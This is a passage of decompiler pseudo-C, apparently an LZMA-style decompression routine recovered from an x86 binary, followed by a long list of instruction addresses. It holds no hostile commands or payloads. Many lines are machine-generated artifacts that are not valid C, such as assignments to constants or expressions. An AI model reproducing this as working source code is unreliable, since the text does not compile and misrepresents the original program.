                              											__ecx =  *(__ebp - 0x3c);
                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                              											__ecx =  *(__ebp - 4);
                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                              											__eflags =  *(__ebp - 0x38) - 4;
                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              											if( *(__ebp - 0x38) >= 4) {
                              												__eflags =  *(__ebp - 0x38) - 0xa;
                              												if( *(__ebp - 0x38) >= 0xa) {
                              													_t98 = __ebp - 0x38;
                              													 *_t98 =  *(__ebp - 0x38) - 6;
                              													__eflags =  *_t98;
                              												} else {
                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                              												}
                              											} else {
                              												 *(__ebp - 0x38) = 0;
                              											}
                              											__eflags =  *(__ebp - 0x34) - __edx;
                              											if( *(__ebp - 0x34) == __edx) {
                              												L35:
                              												__ebx = 0;
                              												__ebx = 1;
                              												goto L61;
                              											} else {
                              												L32:
                              												__eax =  *(__ebp - 0x14);
                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              												__eflags = __eax -  *(__ebp - 0x74);
                              												if(__eax >=  *(__ebp - 0x74)) {
                              													__eax = __eax +  *(__ebp - 0x74);
                              													__eflags = __eax;
                              												}
                              												__ecx =  *(__ebp - 8);
                              												__ebx = 0;
                              												__ebx = 1;
                              												__al =  *((intOrPtr*)(__eax + __ecx));
                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                              												goto L41;
                              											}
                              										case 7:
                              											L66:
                              											__eflags =  *(__ebp - 0x40) - 1;
                              											if( *(__ebp - 0x40) != 1) {
                              												L68:
                              												__eax =  *(__ebp - 0x24);
                              												 *(__ebp - 0x80) = 0x16;
                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              												__eax =  *(__ebp - 0x28);
                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              												__eax =  *(__ebp - 0x2c);
                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              												__eax = 0;
                              												__eflags =  *(__ebp - 0x38) - 7;
                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              												__al = __al & 0x000000fd;
                              												__eax = (__eflags >= 0) - 1 + 0xa;
                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                              												__eax =  *(__ebp - 4);
                              												__eax =  *(__ebp - 4) + 0x664;
                              												__eflags = __eax;
                              												 *(__ebp - 0x58) = __eax;
                              												goto L69;
                              											}
                              											L67:
                              											__eax =  *(__ebp - 4);
                              											__ecx =  *(__ebp - 0x38);
                              											 *(__ebp - 0x84) = 8;
                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                              											goto L132;
                              										case 8:
                              											L70:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												__eax =  *(__ebp - 4);
                              												__ecx =  *(__ebp - 0x38);
                              												 *(__ebp - 0x84) = 0xa;
                              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                              											} else {
                              												__eax =  *(__ebp - 0x38);
                              												__ecx =  *(__ebp - 4);
                              												__eax =  *(__ebp - 0x38) + 0xf;
                              												 *(__ebp - 0x84) = 9;
                              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                              											}
                              											goto L132;
                              										case 9:
                              											L73:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												goto L90;
                              											}
                              											L74:
                              											__eflags =  *(__ebp - 0x60);
                              											if( *(__ebp - 0x60) == 0) {
                              												goto L171;
                              											}
                              											L75:
                              											__eax = 0;
                              											__eflags =  *(__ebp - 0x38) - 7;
                              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                              											__eflags = _t259;
                              											0 | _t259 = _t259 + _t259 + 9;
                              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                              											goto L76;
                              										case 0xa:
                              											L82:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												L84:
                              												__eax =  *(__ebp - 4);
                              												__ecx =  *(__ebp - 0x38);
                              												 *(__ebp - 0x84) = 0xb;
                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                              												goto L132;
                              											}
                              											L83:
                              											__eax =  *(__ebp - 0x28);
                              											goto L89;
                              										case 0xb:
                              											L85:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												__ecx =  *(__ebp - 0x24);
                              												__eax =  *(__ebp - 0x20);
                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              											} else {
                              												__eax =  *(__ebp - 0x24);
                              											}
                              											__ecx =  *(__ebp - 0x28);
                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              											L89:
                              											__ecx =  *(__ebp - 0x2c);
                              											 *(__ebp - 0x2c) = __eax;
                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              											L90:
                              											__eax =  *(__ebp - 4);
                              											 *(__ebp - 0x80) = 0x15;
                              											__eax =  *(__ebp - 4) + 0xa68;
                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                              											goto L69;
                              										case 0xc:
                              											L99:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												L164:
                              												 *(__ebp - 0x88) = 0xc;
                              												goto L170;
                              											}
                              											L100:
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t334 = __ebp - 0x70;
                              											 *_t334 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t334;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											__eax =  *(__ebp - 0x2c);
                              											goto L101;
                              										case 0xd:
                              											L37:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												L159:
                              												 *(__ebp - 0x88) = 0xd;
                              												goto L170;
                              											}
                              											L38:
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t122 = __ebp - 0x70;
                              											 *_t122 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t122;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											L39:
                              											__eax =  *(__ebp - 0x40);
                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                              												goto L48;
                              											}
                              											L40:
                              											__eflags = __ebx - 0x100;
                              											if(__ebx >= 0x100) {
                              												goto L54;
                              											}
                              											L41:
                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                              											__ecx =  *(__ebp - 0x58);
                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                              											 *(__ebp - 0x48) = __eax;
                              											__eax = __eax + 1;
                              											__eax = __eax << 8;
                              											__eax = __eax + __ebx;
                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              											__ax =  *__esi;
                              											 *(__ebp - 0x54) = __esi;
                              											__edx = __ax & 0x0000ffff;
                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                              											__eflags =  *(__ebp - 0xc) - __ecx;
                              											if( *(__ebp - 0xc) >= __ecx) {
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              												__cx = __ax;
                              												 *(__ebp - 0x40) = 1;
                              												__cx = __ax >> 5;
                              												__eflags = __eax;
                              												__ebx = __ebx + __ebx + 1;
                              												 *__esi = __ax;
                              											} else {
                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                              												 *(__ebp - 0x10) = __ecx;
                              												0x800 = 0x800 - __edx;
                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                              												__ebx = __ebx + __ebx;
                              												 *__esi = __cx;
                              											}
                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                              											 *(__ebp - 0x44) = __ebx;
                              											if( *(__ebp - 0x10) >= 0x1000000) {
                              												goto L39;
                              											} else {
                              												L45:
                              												goto L37;
                              											}
                              										case 0xe:
                              											L46:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												L160:
                              												 *(__ebp - 0x88) = 0xe;
                              												goto L170;
                              											}
                              											L47:
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t156 = __ebp - 0x70;
                              											 *_t156 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t156;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											while(1) {
                              												L48:
                              												__eflags = __ebx - 0x100;
                              												if(__ebx >= 0x100) {
                              													break;
                              												}
                              												L49:
                              												__eax =  *(__ebp - 0x58);
                              												__edx = __ebx + __ebx;
                              												__ecx =  *(__ebp - 0x10);
                              												__esi = __edx + __eax;
                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                              												__ax =  *__esi;
                              												 *(__ebp - 0x54) = __esi;
                              												__edi = __ax & 0x0000ffff;
                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              												__eflags =  *(__ebp - 0xc) - __ecx;
                              												if( *(__ebp - 0xc) >= __ecx) {
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              													__cx = __ax;
                              													_t170 = __edx + 1; // 0x1
                              													__ebx = _t170;
                              													__cx = __ax >> 5;
                              													__eflags = __eax;
                              													 *__esi = __ax;
                              												} else {
                              													 *(__ebp - 0x10) = __ecx;
                              													0x800 = 0x800 - __edi;
                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              													__ebx = __ebx + __ebx;
                              													 *__esi = __cx;
                              												}
                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                              												 *(__ebp - 0x44) = __ebx;
                              												if( *(__ebp - 0x10) >= 0x1000000) {
                              													continue;
                              												} else {
                              													L53:
                              													goto L46;
                              												}
                              											}
                              											L54:
                              											_t173 = __ebp - 0x34;
                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                              											__eflags =  *_t173;
                              											goto L55;
                              										case 0xf:
                              											L58:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												L161:
                              												 *(__ebp - 0x88) = 0xf;
                              												goto L170;
                              											}
                              											L59:
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t203 = __ebp - 0x70;
                              											 *_t203 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t203;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											L60:
                              											__eflags = __ebx - 0x100;
                              											if(__ebx >= 0x100) {
                              												L55:
                              												__al =  *(__ebp - 0x44);
                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                              												goto L56;
                              											}
                              											L61:
                              											__eax =  *(__ebp - 0x58);
                              											__edx = __ebx + __ebx;
                              											__ecx =  *(__ebp - 0x10);
                              											__esi = __edx + __eax;
                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                              											__ax =  *__esi;
                              											 *(__ebp - 0x54) = __esi;
                              											__edi = __ax & 0x0000ffff;
                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              											__eflags =  *(__ebp - 0xc) - __ecx;
                              											if( *(__ebp - 0xc) >= __ecx) {
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              												__cx = __ax;
                              												_t217 = __edx + 1; // 0x1
                              												__ebx = _t217;
                              												__cx = __ax >> 5;
                              												__eflags = __eax;
                              												 *__esi = __ax;
                              											} else {
                              												 *(__ebp - 0x10) = __ecx;
                              												0x800 = 0x800 - __edi;
                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              												__ebx = __ebx + __ebx;
                              												 *__esi = __cx;
                              											}
                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                              											 *(__ebp - 0x44) = __ebx;
                              											if( *(__ebp - 0x10) >= 0x1000000) {
                              												goto L60;
                              											} else {
                              												L65:
                              												goto L58;
                              											}
                              										case 0x10:
                              											L109:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												L165:
                              												 *(__ebp - 0x88) = 0x10;
                              												goto L170;
                              											}
                              											L110:
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t365 = __ebp - 0x70;
                              											 *_t365 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t365;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											goto L111;
                              										case 0x11:
                              											L69:
                              											__esi =  *(__ebp - 0x58);
                              											 *(__ebp - 0x84) = 0x12;
                              											goto L132;
                              										case 0x12:
                              											L128:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												L131:
                              												__eax =  *(__ebp - 0x58);
                              												 *(__ebp - 0x84) = 0x13;
                              												__esi =  *(__ebp - 0x58) + 2;
                              												L132:
                              												 *(_t644 - 0x54) = _t642;
                              												goto L133;
                              											}
                              											L129:
                              											__eax =  *(__ebp - 0x4c);
                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                              											__ecx =  *(__ebp - 0x58);
                              											__eax =  *(__ebp - 0x4c) << 4;
                              											__eflags = __eax;
                              											__eax =  *(__ebp - 0x58) + __eax + 4;
                              											goto L130;
                              										case 0x13:
                              											L141:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												L143:
                              												_t469 = __ebp - 0x58;
                              												 *_t469 =  *(__ebp - 0x58) + 0x204;
                              												__eflags =  *_t469;
                              												 *(__ebp - 0x30) = 0x10;
                              												 *(__ebp - 0x40) = 8;
                              												L144:
                              												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                              												L145:
                              												 *(_t644 - 0x50) = 1;
                              												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                              												goto L149;
                              											}
                              											L142:
                              											__eax =  *(__ebp - 0x4c);
                              											__ecx =  *(__ebp - 0x58);
                              											__eax =  *(__ebp - 0x4c) << 4;
                              											 *(__ebp - 0x30) = 8;
                              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                              											L130:
                              											 *(__ebp - 0x58) = __eax;
                              											 *(__ebp - 0x40) = 3;
                              											goto L144;
                              										case 0x14:
                              											L156:
                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                              											__eax =  *(__ebp - 0x80);
                              											while(1) {
                              												L140:
                              												 *(_t644 - 0x88) = _t537;
                              												goto L1;
                              											}
                              										case 0x15:
                              											L91:
                              											__eax = 0;
                              											__eflags =  *(__ebp - 0x38) - 7;
                              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              											__al = __al & 0x000000fd;
                              											__eax = (__eflags >= 0) - 1 + 0xb;
                              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                              											goto L120;
                              										case 0x16:
                              											goto L0;
                              										case 0x17:
                              											while(1) {
                              												L145:
                              												 *(_t644 - 0x50) = 1;
                              												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                              												goto L149;
                              											}
                              										case 0x18:
                              											goto L146;
                              										case 0x19:
                              											L94:
                              											__eflags = __ebx - 4;
                              											if(__ebx < 4) {
                              												L98:
                              												 *(__ebp - 0x2c) = __ebx;
                              												L119:
                              												_t393 = __ebp - 0x2c;
                              												 *_t393 =  *(__ebp - 0x2c) + 1;
                              												__eflags =  *_t393;
                              												L120:
                              												__eax =  *(__ebp - 0x2c);
                              												__eflags = __eax;
                              												if(__eax == 0) {
                              													L166:
                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                              													goto L170;
                              												}
                              												L121:
                              												__eflags = __eax -  *(__ebp - 0x60);
                              												if(__eax >  *(__ebp - 0x60)) {
                              													goto L171;
                              												}
                              												L122:
                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                              												__eax =  *(__ebp - 0x30);
                              												_t400 = __ebp - 0x60;
                              												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                              												__eflags =  *_t400;
                              												goto L123;
                              											}
                              											L95:
                              											__ecx = __ebx;
                              											__eax = __ebx;
                              											__ecx = __ebx >> 1;
                              											__eax = __ebx & 0x00000001;
                              											__ecx = (__ebx >> 1) - 1;
                              											__al = __al | 0x00000002;
                              											__eax = (__ebx & 0x00000001) << __cl;
                              											__eflags = __ebx - 0xe;
                              											 *(__ebp - 0x2c) = __eax;
                              											if(__ebx >= 0xe) {
                              												L97:
                              												__ebx = 0;
                              												 *(__ebp - 0x48) = __ecx;
                              												L102:
                              												__eflags =  *(__ebp - 0x48);
                              												if( *(__ebp - 0x48) <= 0) {
                              													L107:
                              													__eax = __eax + __ebx;
                              													 *(__ebp - 0x40) = 4;
                              													 *(__ebp - 0x2c) = __eax;
                              													__eax =  *(__ebp - 4);
                              													__eax =  *(__ebp - 4) + 0x644;
                              													__eflags = __eax;
                              													L108:
                              													__ebx = 0;
                              													 *(__ebp - 0x58) = __eax;
                              													 *(__ebp - 0x50) = 1;
                              													 *(__ebp - 0x44) = 0;
                              													 *(__ebp - 0x48) = 0;
                              													L112:
                              													__eax =  *(__ebp - 0x40);
                              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                              														L118:
                              														_t391 = __ebp - 0x2c;
                              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                              														__eflags =  *_t391;
                              														goto L119;
                              													}
                              													L113:
                              													__eax =  *(__ebp - 0x50);
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              													__eax =  *(__ebp - 0x58);
                              													__esi = __edi + __eax;
                              													 *(__ebp - 0x54) = __esi;
                              													__ax =  *__esi;
                              													__ecx = __ax & 0x0000ffff;
                              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                              													__eflags =  *(__ebp - 0xc) - __edx;
                              													if( *(__ebp - 0xc) >= __edx) {
                              														__ecx = 0;
                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                              														__ecx = 1;
                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                              														__ebx = 1;
                              														__ecx =  *(__ebp - 0x48);
                              														__ebx = 1 << __cl;
                              														__ecx = 1 << __cl;
                              														__ebx =  *(__ebp - 0x44);
                              														__ebx =  *(__ebp - 0x44) | __ecx;
                              														__cx = __ax;
                              														__cx = __ax >> 5;
                              														__eax = __eax - __ecx;
                              														__edi = __edi + 1;
                              														__eflags = __edi;
                              														 *(__ebp - 0x44) = __ebx;
                              														 *__esi = __ax;
                              														 *(__ebp - 0x50) = __edi;
                              													} else {
                              														 *(__ebp - 0x10) = __edx;
                              														0x800 = 0x800 - __ecx;
                              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              														 *__esi = __dx;
                              													}
                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                              													if( *(__ebp - 0x10) >= 0x1000000) {
                              														L111:
                              														_t368 = __ebp - 0x48;
                              														 *_t368 =  *(__ebp - 0x48) + 1;
                              														__eflags =  *_t368;
                              														goto L112;
                              													} else {
                              														L117:
                              														goto L109;
                              													}
                              												}
                              												L103:
                              												__ecx =  *(__ebp - 0xc);
                              												__ebx = __ebx + __ebx;
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              												 *(__ebp - 0x44) = __ebx;
                              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                              													__ecx =  *(__ebp - 0x10);
                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              													__ebx = __ebx | 0x00000001;
                              													__eflags = __ebx;
                              													 *(__ebp - 0x44) = __ebx;
                              												}
                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                              												if( *(__ebp - 0x10) >= 0x1000000) {
                              													L101:
                              													_t338 = __ebp - 0x48;
                              													 *_t338 =  *(__ebp - 0x48) - 1;
                              													__eflags =  *_t338;
                              													goto L102;
                              												} else {
                              													L106:
                              													goto L99;
                              												}
                              											}
                              											L96:
                              											__edx =  *(__ebp - 4);
                              											__eax = __eax - __ebx;
                              											 *(__ebp - 0x40) = __ecx;
                              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                              											goto L108;
                              										case 0x1a:
                              											L56:
                              											__eflags =  *(__ebp - 0x64);
                              											if( *(__ebp - 0x64) == 0) {
                              												L162:
                              												 *(__ebp - 0x88) = 0x1a;
                              												goto L170;
                              											}
                              											L57:
                              											__ecx =  *(__ebp - 0x68);
                              											__al =  *(__ebp - 0x5c);
                              											__edx =  *(__ebp - 8);
                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              											 *( *(__ebp - 0x68)) = __al;
                              											__ecx =  *(__ebp - 0x14);
                              											 *(__ecx +  *(__ebp - 8)) = __al;
                              											__eax = __ecx + 1;
                              											__edx = 0;
                              											_t192 = __eax %  *(__ebp - 0x74);
                              											__eax = __eax /  *(__ebp - 0x74);
                              											__edx = _t192;
                              											goto L80;
                              										case 0x1b:
                              											L76:
                              											__eflags =  *(__ebp - 0x64);
                              											if( *(__ebp - 0x64) == 0) {
                              												L163:
                              												 *(__ebp - 0x88) = 0x1b;
                              												goto L170;
                              											}
                              											L77:
                              											__eax =  *(__ebp - 0x14);
                              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              											__eflags = __eax -  *(__ebp - 0x74);
                              											if(__eax >=  *(__ebp - 0x74)) {
                              												__eax = __eax +  *(__ebp - 0x74);
                              												__eflags = __eax;
                              											}
                              											__edx =  *(__ebp - 8);
                              											__cl =  *(__eax + __edx);
                              											__eax =  *(__ebp - 0x14);
                              											 *(__ebp - 0x5c) = __cl;
                              											 *(__eax + __edx) = __cl;
                              											__eax = __eax + 1;
                              											__edx = 0;
                              											_t275 = __eax %  *(__ebp - 0x74);
                              											__eax = __eax /  *(__ebp - 0x74);
                              											__edx = _t275;
                              											__eax =  *(__ebp - 0x68);
                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              											_t284 = __ebp - 0x64;
                              											 *_t284 =  *(__ebp - 0x64) - 1;
                              											__eflags =  *_t284;
                              											 *( *(__ebp - 0x68)) = __cl;
                              											L80:
                              											 *(__ebp - 0x14) = __edx;
                              											goto L81;
                              										case 0x1c:
                              											while(1) {
                              												L123:
                              												__eflags =  *(__ebp - 0x64);
                              												if( *(__ebp - 0x64) == 0) {
                              													break;
                              												}
                              												L124:
                              												__eax =  *(__ebp - 0x14);
                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              												__eflags = __eax -  *(__ebp - 0x74);
                              												if(__eax >=  *(__ebp - 0x74)) {
                              													__eax = __eax +  *(__ebp - 0x74);
                              													__eflags = __eax;
                              												}
                              												__edx =  *(__ebp - 8);
                              												__cl =  *(__eax + __edx);
                              												__eax =  *(__ebp - 0x14);
                              												 *(__ebp - 0x5c) = __cl;
                              												 *(__eax + __edx) = __cl;
                              												__eax = __eax + 1;
                              												__edx = 0;
                              												_t414 = __eax %  *(__ebp - 0x74);
                              												__eax = __eax /  *(__ebp - 0x74);
                              												__edx = _t414;
                              												__eax =  *(__ebp - 0x68);
                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                              												__eflags =  *(__ebp - 0x30);
                              												 *( *(__ebp - 0x68)) = __cl;
                              												 *(__ebp - 0x14) = _t414;
                              												if( *(__ebp - 0x30) > 0) {
                              													continue;
                              												} else {
                              													L127:
                              													L81:
                              													 *(__ebp - 0x88) = 2;
                              													goto L1;
                              												}
                              											}
                              											L167:
                              											 *(__ebp - 0x88) = 0x1c;
                              											goto L170;
                              									}
                              								}
                              								L171:
                              								_t539 = _t538 | 0xffffffff;
                              								goto L172;
                              							}
                              						}
                              					}
                              				}
                              			}















                              0x004069db
                              0x004069dd
                              0x004069dd
                              0x004069dd
                              0x004069e0
                              0x004069e3
                              0x004069e3
                              0x004069e6
                              0x004069e9
                              0x00000000
                              0x00000000
                              0x004069ef
                              0x004069ef
                              0x004069f5
                              0x00000000
                              0x00000000
                              0x004069fb
                              0x004069fb
                              0x004069ff
                              0x00406a02
                              0x00406a05
                              0x00406a08
                              0x00406a0b
                              0x00406a0c
                              0x00406a0f
                              0x00406a11
                              0x00406a17
                              0x00406a1a
                              0x00406a1d
                              0x00406a20
                              0x00406a23
                              0x00406a26
                              0x00406a29
                              0x00406a45
                              0x00406a48
                              0x00406a4b
                              0x00406a4e
                              0x00406a55
                              0x00406a59
                              0x00406a5b
                              0x00406a5f
                              0x00406a2b
                              0x00406a2b
                              0x00406a2f
                              0x00406a37
                              0x00406a3c
                              0x00406a3e
                              0x00406a40
                              0x00406a40
                              0x00406a62
                              0x00406a69
                              0x00406a6c
                              0x00000000
                              0x00406a72
                              0x00406a72
                              0x00000000
                              0x00406a72
                              0x00000000
                              0x00406a77
                              0x00406a77
                              0x00406a7b
                              0x0040713b
                              0x0040713b
                              0x00000000
                              0x0040713b
                              0x00406a81
                              0x00406a81
